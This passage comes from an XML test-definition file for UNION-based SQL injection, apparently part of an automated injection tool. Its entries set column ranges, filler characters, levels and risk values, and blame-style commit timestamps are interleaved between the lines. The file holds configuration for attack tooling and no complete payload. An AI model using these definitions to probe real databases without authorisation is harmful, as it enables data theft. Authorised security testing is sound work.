2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query ([CHAR]) - 21 to 30 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [CHAR]</char>
2012-04-26 00:37:39 +04:00
<columns > 21-30</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query (NULL) - 21 to 30 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > NULL</char>
2012-04-26 00:37:39 +04:00
<columns > 21-30</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [RANDNUM]</char>
2012-04-26 00:37:39 +04:00
<columns > 21-30</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query ([CHAR]) - 31 to 40 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [CHAR]</char>
2012-04-26 00:37:39 +04:00
<columns > 31-40</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query (NULL) - 31 to 40 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > NULL</char>
2012-04-26 00:37:39 +04:00
<columns > 31-40</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [RANDNUM]</char>
2012-04-26 00:37:39 +04:00
<columns > 31-40</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query ([CHAR]) - 41 to 50 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [CHAR]</char>
2012-04-26 00:37:39 +04:00
<columns > 41-50</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query (NULL) - 41 to 50 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > NULL</char>
2012-04-26 00:37:39 +04:00
<columns > 41-50</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [RANDNUM]</char>
2012-04-26 00:37:39 +04:00
<columns > 41-50</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
2011-01-12 01:18:47 +03:00
<!-- End of UNION query tests -->
2010-11-28 21:10:54 +03:00
</root>
